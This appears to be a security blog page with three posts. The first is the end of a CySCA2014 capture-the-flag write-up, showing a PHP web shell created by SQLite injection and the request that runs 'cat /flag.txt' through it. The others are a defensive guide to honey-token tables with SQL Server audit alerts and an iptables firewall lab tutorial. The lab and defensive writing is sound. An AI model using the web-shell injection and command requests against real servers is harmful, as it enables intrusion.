NOTE: I messed up my commands, resulting in a file ‘a.php’ that did not allow me to execute system commands. I entered everything again, but of course the database ‘a’ and table ‘a.b’ already existed, so in the rest of the screenshots you will see ‘z.php’ and database ‘z’ instead.

image51

image52

As shown above, accessing ‘z.php’ and feeding it the ‘ls’ command returns the contents of the working directory. The SQLite header at the start of the file is there because SQLite created ‘z.php’ as a database file, so it carries additional database information. It doesn’t interfere with our commands though, and feeding it the system command ‘cat /flag.txt’ returns the final flag for the web application pentest section of CySCA2014: “TryingCrampFibrous963”.
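In other words, once the injected file exists, the final step is a single request; ours looked something like this (host IP from our lab setup):

http://192.168.198.128/z.php?cmd=cat%20/flag.txt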

image53

Creating a Honey Token on a Microsoft SQL Server

This walk-through is meant to provide DBAs or system admins working with databases with a method of implementing a honey token for security purposes. The method outlined here is not the only way to implement a honey token, and I make no guarantee that it is the best of all options; it is simply the method that was chosen based on the DBA’s knowledge of the system and the alternatives.

A honey token is a piece of information – or a collection of pieces of information – that serves no purpose other than to alert stakeholders of possible unauthorized access to sensitive data. In this walk-through the honey token is a fake table in a production database. The table was created and populated with information by the DBA, and unlike the hundreds of other tables in the same database it serves no legitimate purpose: the application that relies on the database will never touch the honey token table. Therefore, any time the table is accessed, it can be assumed that someone has obtained unauthorized access to the database and is trying to find out what information the tables contain.

Implementing the honey token was not as easy as originally expected, which is why this walk-through was created – to help anyone else out there looking to accomplish the same thing. Creating a fake table is easy enough, but how do you know when someone accesses it? The first idea was to have a trigger send out an email alert any time the table is used. The problem with this is that a trigger can only fire on events that alter the table – inserts, deletes, or updates. A trigger cannot fire on a simple SELECT statement, which is what is most likely to occur once an attacker gains unauthorized access to the database.

After some Googling I found that while a trigger cannot be set for SELECT statements, the desired effect can be obtained by setting up a server audit. The Microsoft Knowledge Base has a resource that describes the process of setting up a server audit and contains an example script that is easily customized for any environment.

Setting up a Table Audit

The first step is to create the fake table in your database – the honey token. Make sure the table name doesn’t give away that it is a honey token: it should follow the naming conventions of the rest of the database so that it looks generic. It also needs to be populated with data. While you will still get a notification if an attacker queries an empty table, the idea is not to tip off the attacker that anything is out of the ordinary. Also make sure it contains only data that is useless to an attacker – you wouldn’t want to accidentally hand them something they can use.

After the honey token table has been created, you can set up the audit on it. The T-SQL commands that I ended up using are as follows. Make sure to create the folder structure for the audit file before running this script, or the commands will fail.

USE master;
GO

CREATE SERVER AUDIT <Enter Audit Name>
TO FILE ( FILEPATH = '<path to audit file>' );
GO

ALTER SERVER AUDIT <Enter Audit Name>
WITH (STATE = ON);
GO

USE <Enter DB Name>;
GO

CREATE DATABASE AUDIT SPECIFICATION <Enter Specification Name>
FOR SERVER AUDIT <Enter Audit Name>
ADD (SELECT ON <Enter Table Name> BY PUBLIC)
WITH (STATE = ON);
GO

SELECT *
FROM <Enter Table Name>;
GO

SELECT *
FROM fn_get_audit_file('<path to audit file>', NULL, NULL);
GO

Now the audit has been set up. Any SELECT statement executed against the audited table will produce a new entry in the audit file, which you can confirm by executing the last two SELECT statements from the script once or twice.

Automatic Notification

Of course, the goal is to be notified automatically if someone without authorization is looking around in your database. To accomplish this, a stored procedure can be used in combination with an automated job: the stored procedure queries the audit file for any new entries since the last time the job ran and, if it finds any, sends out an email; the automated job simply executes the stored procedure on a schedule. To get alerts as quickly as possible the job needs to run often, such as every minute. The code for the stored procedure is below. Note that the audit time the stored procedure looks at is adjusted by -7 hours: the audit time is always recorded in UTC, and -7 hours corrects for my time zone. Make sure to adjust this correction to whatever is appropriate for yours.


 

CREATE PROCEDURE <Enter SP Name>
@recipients varchar(max) = '<enter recipients'' email addresses>'
AS

Declare @results Table
(
event_time datetime,
action_id varchar(5),
session_server_principal_name varchar(100),
server_instance_name varchar(100),
database_name varchar(100),
[object_name] varchar(100),
[statement] varchar(max),
additional_information varchar(max)
)

-- find the last time the stored procedure ran and save that datetime as a variable
declare @lastrun datetime =
(
Select Top 1
Convert
(
DateTime,
Stuff(Stuff(Convert(VarChar, run_date), 7, 0, '-'), 5, 0, '-')
+ ' '
+ Right('0' + Convert(VarChar, (run_time % 1000000) / 10000), 2)
+ ':'
+ Right('0' + Convert(VarChar, (run_time % 10000) / 100), 2)
+ ':'
+ Right('0' + Convert(VarChar, (run_time % 100) / 1), 2)
) As Lastrun
From msdb.dbo.SysJobHistory With (NoLock)
Where step_name = 'Server Audit'
Order By instance_id Desc
)

-- query the audit file for any new entries since the last run
Insert Into @results
(
event_time,
action_id,
session_server_principal_name,
server_instance_name,
database_name,
[object_name],
[statement],
additional_information
)
Select
dateadd(hh, -7, event_time) as event_time -- -7 hours because event_time is logged in UTC
,action_id
,session_server_principal_name
,server_instance_name
,database_name
,[object_name]
,[statement]
,additional_information
From fn_get_audit_file('<Enter path to audit file>', NULL, NULL)
Where dateadd(hh, -7, event_time) > @lastrun

select [statement] from @results

-- if there are new results, send out an email
DECLARE @body NVARCHAR(MAX) =
'<html><body><H3>Alert</H3>'
+ '<br>'
+ 'A honey token table was accessed. Someone might be trying to access your database without permission!' + '<br>'

If exists (select 1 from @results)
begin
SELECT @body = @body
+ '<br>'
+ 'Time: ' + Convert(VarChar, event_time) + '<br>'
+ 'Server: ' + server_instance_name + '<br>'
+ 'Database: ' + database_name + '<br>'
+ 'Table: ' + [object_name] + '<br>'
+ 'Username: ' + session_server_principal_name + '<br>'
+ 'Query: ' + [statement] + '<br>'
from @results

EXEC msdb.dbo.sp_send_dbmail
@profile_name = '<Enter Profile Name>',
@body = @body,
@body_format = 'HTML',
@recipients = @recipients,
@subject = 'Honey Token Alert!';
end


 

Now simply create an automated job that executes this stored procedure every minute, and you will be notified by email any time the honey token table is queried. One detail to watch: the stored procedure determines its last run time by looking up job history entries where step_name = 'Server Audit', so the job step that runs it must be named accordingly, as sketched below.
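For completeness, here is a sketch of what that job could look like using SQL Server Agent’s stored procedures. The job and schedule names are made up; the step name 'Server Audit' must match what the stored procedure’s @lastrun lookup expects:

USE msdb;
GO

EXEC dbo.sp_add_job @job_name = 'Honey Token Monitor';

EXEC dbo.sp_add_jobstep
    @job_name = 'Honey Token Monitor',
    @step_name = 'Server Audit',        -- must match the step_name in the stored procedure
    @subsystem = 'TSQL',
    @database_name = '<Enter DB Name>',
    @command = 'EXEC <Enter SP Name>;';

EXEC dbo.sp_add_jobschedule
    @job_name = 'Honey Token Monitor',
    @name = 'Every minute',
    @freq_type = 4,                     -- daily
    @freq_interval = 1,
    @freq_subday_type = 4,              -- repeat on a minutes interval
    @freq_subday_interval = 1;          -- every 1 minute

EXEC dbo.sp_add_jobserver @job_name = 'Honey Token Monitor';
GO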

Linux IPtables

In this blog post I will describe how to set up a basic firewall on Linux using IPtables. Setting up a firewall is only half the work, though; a smart information security professional will also test their firewall configuration thoroughly. I set up a virtual lab environment on my home laptop for testing purposes. To simulate a network with security zones (internal/external) I used a Vyatta router to divide the network into subnets. I set all of this up using VMware Workstation, which is commercial software, but you can simulate this just as well using Oracle’s free VirtualBox.

virtual lab topology

Setup

I created two virtual machines, both running Xubuntu 13.10. One simulated an internal web server and the other a developer machine. The internal web server was given the hostname “Xubuntu-web” and the IP address 192.168.133.150 on a host-only virtual network. The developer machine was given the hostname “Xubuntu-dev” and the IP address 192.168.133.200 on the same host-only network.

On Xubuntu-web the packages “openssh-server” and “apache2” were installed by using the command:

sudo apt-get install openssh-server apache2

On Xubuntu-dev the packages “openssh-server” and “vsftpd” were installed by using the command:

sudo apt-get install openssh-server vsftpd

Before making any configuration changes, let’s make sure that everything is set up and working as it is supposed to. The image below shows that the two virtual machines were able to communicate on the network.

ping results

Xubuntu-web had an SSH server and a web server running (port 22 and port 80), and Xubuntu-dev had an FTP server and an SSH server running (port 21 and port 22), as shown in the image below.

running services

Finally, the three images below show that Xubuntu-web can access Xubuntu-dev’s FTP and SSH services, and Xubuntu-dev can access Xubuntu-web’s SSH and HTTP services.

web can ftp and ssh to dev

dev can ssh to web

dev can http to web

IPtables

Now that the two Xubuntu boxes have some services running and can communicate with each other, it’s time to start restricting access using IPtables. Let’s say that we want to implement the following security restrictions:

  • The intranet website should only be accessible from the internal network
  • The intranet server’s SSH service should only be accessible from the developer machine
  • The intranet server should not be able to use FTP or SSH services
  • The developer machine’s SSH service should be accessible from anywhere
  • The developer machine’s FTP service should only be accessible from the internal network

The syntax for implementing the first rule is this:

sudo iptables -A INPUT --source 192.168.133.0/24 -p tcp --dport 80 -j ACCEPT

The breakdown of this command is as follows:

iptables                The command to configure the iptables firewall

-A                      Append a rule to the end of the rule list

INPUT                   The rule applies to incoming traffic

--source <ip>           The rule applies to traffic originating from the designated address or range

-p <protocol>           The rule applies to traffic matching the protocol

--dport <port>          The rule applies to traffic destined for the designated port

-j ACCEPT               Any traffic matching the rule will be accepted

Of course, all the elements in this command can be changed based on what the rule is supposed to do or where it is supposed to fit in the rule list. For instance, instead of ‘-A’ to append a rule at the end of the list, you can use ‘-I’ to insert a rule at a specific position, or ‘-D’ to delete a rule from the list; a couple of examples are shown below. Instead of ‘-j ACCEPT’ you can use ‘-j REJECT’ to reject any traffic that matches the rule. To learn more about the syntax for iptables rules and the different flags, I recommend the iptables man pages.
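For instance, the following would insert an SSH allow rule at position 3 of the INPUT chain and then delete whatever rule sits at that position (the position and address here are just examples):

sudo iptables -I INPUT 3 --source 192.168.133.200 -p tcp --dport 22 -j ACCEPT

sudo iptables -D INPUT 3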

While you are configuring your firewall, or when you are done, you can look at your rule list with this command:

sudo iptables -L -n

The ‘-L’ flag displays the rule list, and the ‘-n’ flag enables numeric output. By default, iptables will try to resolve addresses and ports to hostnames, network names, or service names; the ‘-n’ flag skips those lookups, which speeds up the output.

The rest of the firewall rules were implemented as shown in the images below.

firewall rules

From those images you might notice that I also added some rules that weren’t in the restriction requirements. For instance, the first rule in both lists allows incoming ICMP traffic from anywhere. This was done purely for testing purposes – so that I could make sure a service is unavailable because the firewall is blocking it, not because the host cannot be contacted. In a production environment this rule would likely be left out for security reasons. The second rule in both lists allows network traffic belonging to an established or related session; this means that any traffic coming back to a host as part of, or related to, a session that the host originally established is allowed. Finally, the last rule in both incoming lists rejects all traffic other than what was explicitly allowed. A reconstruction of the full rule sets is sketched below.
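Since the rules in the screenshots don’t reproduce well in text, here is a reconstruction of the two rule sets that satisfy the restrictions above; treat this as a sketch rather than a verbatim copy of my configuration.

On Xubuntu-web (192.168.133.150):

sudo iptables -A INPUT -p icmp -j ACCEPT

sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

sudo iptables -A INPUT --source 192.168.133.0/24 -p tcp --dport 80 -j ACCEPT

sudo iptables -A INPUT --source 192.168.133.200 -p tcp --dport 22 -j ACCEPT

sudo iptables -A INPUT -j REJECT

sudo iptables -A OUTPUT -p tcp --dport 21 -j REJECT

sudo iptables -A OUTPUT -p tcp --dport 22 -j REJECT

On Xubuntu-dev (192.168.133.200):

sudo iptables -A INPUT -p icmp -j ACCEPT

sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT

sudo iptables -A INPUT --source 192.168.133.0/24 -p tcp --dport 21 -j ACCEPT

sudo iptables -A INPUT -j REJECT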

Testing

So now that the firewalls are up, let’s test them. Two additional virtual machines were used for the testing: a Windows XP box on the internal network and a Kali Linux box on the external network (see the topology near the top of this blog post). The tests should show the following:

  • The intranet site should be accessible by all except Kali
  • The intranet server’s SSH service should only be accessible by the developer machine
  • The developer machine’s FTP service should be accessible only by Windows XP (because the intranet server is not allowed to make outgoing FTP or SSH requests)
  • The developer machine’s SSH service should be accessible by all except the intranet server (for the same reason)

First let’s check for the restrictions on access to the Intranet site. Using each virtual machine to open up a web browser and navigate to the Intranet site shows that both the developer machine and Windows XP have no problem reaching the site, but Kali Linux is blocked. This verifies that the site is only reachable from the internal network.

http test

Next we’ll test to make sure that only the developer machine can SSH into the Intranet web server. The developer machine was successfully able to establish an SSH connection with the server, but both Windows XP and Kali Linux are rejected. This verifies that our second restriction objective is met.

ssh to web test

Next we want to test that the developer’s FTP server is only accessible from the intranet. Connecting through Windows XP works just fine, but a connection from Kali Linux is rejected. The Intranet web server would be allowed to connect, but since that host has outbound SSH and FTP connections blocked through its own firewall the connection is rejected.

ftp to dev test

Finally, we want to test that the developer’s SSH service is accessible both from the internal and external network. Indeed, connecting from Windows XP and Kali Linux both leads to a successful SSH session. Again, the Intranet web server would also be allowed had the connection not been blocked by that host’s own firewall.

ssh to dev test

It seems that all desired network restrictions are enforced by the Linux IPtables firewalls. Although the title of this blog post is “Linux IPtables”, a large part of it was dedicated to testing the iptables rules rather than setting them up. The thing is, setting up rules is easy once you get the hang of the syntax. However, setting them up correctly, and verifying that they have been set up correctly, is more complicated. The more rules you implement, the more difficult it gets, because they tend to interfere with each other. You can’t test a rule from one host and assume it works correctly. What I really wanted to show in this post was how to logically think through your firewall rules and how to test them from multiple hosts and subnets.

Leave me a comment for feedback!